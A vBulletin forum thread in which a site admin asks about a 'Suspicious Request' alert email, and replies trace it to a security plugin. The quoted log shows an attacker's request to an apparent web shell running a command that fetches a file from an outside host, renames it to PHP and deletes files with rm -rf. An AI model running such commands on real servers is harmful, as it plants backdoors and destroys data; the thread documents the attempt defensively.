For the life of me, I can' figure out where these are coming from but I'd like to know more so I can investigate further. From time to time we get an email like the one below:

Email title:
Suspicious Request

Email body:
Cinput: wget http://www.allegoriaonline.it/images/incs.txt ; mv incs.txt incs.php ; rm -rf componentz.zip


Forum: http://www.therpf.com

IP: 176.28.49.238
User-agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
Request: /forum.php//images/stories/racrew.php?cmd=wget%20http://www.allegoriaonline.it/images/incs.txt%20;%20mv%20incs.txt%20incs.php%20;%20rm%2 0-rf%20componentz.zip
User: Unregistered

GET: array (
'cmd' => 'wget http://www.allegoriaonline.it/images/incs.txt ; mv incs.txt incs.php ; rm -rf componentz.zip',
)

POST: array (
'ajax' => NULL,
)

COOKIE: array (
'vbulletin_collapse' => NULL,
'bb_referrerid' => NULL,
'bb_userid' => NULL,
'bb_password' => NULL,
'bb_lastvisit' => NULL,
'bb_lastactivity' => NULL,
'bb_threadedmode' => NULL,
'bb_sessionhash' => NULL,
'bb_userstyleid' => NULL,
'bb_languageid' => NULL,
'bb_skipmobilestyle' => NULL,
'bb_forum_view' => NULL,
'vbulletin_sidebar_collapse' => NULL,
)

I have asked my server admin about it and he said nothing on the server side is doing it and that it is being generated through vB. I can't seem to find any info on it. Please help!

It's not from default vbulletin. You would need to look through your modifications to see what is generating it.

User-agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online BrowserIt's quite safe to enter the bolded into the definitions of the "Ban Spiders bt User Agent" mod. Anyone still using that needs his/her ass removed anyway, and by the looks of your OP they're up to no good as well.

I think I may have figured out which plugin is generating this info:

vBSEO Suspicious Activity Tracker

Since vBSEO is no more, I can't really seem to find out anything else about it, but I did find it interesting.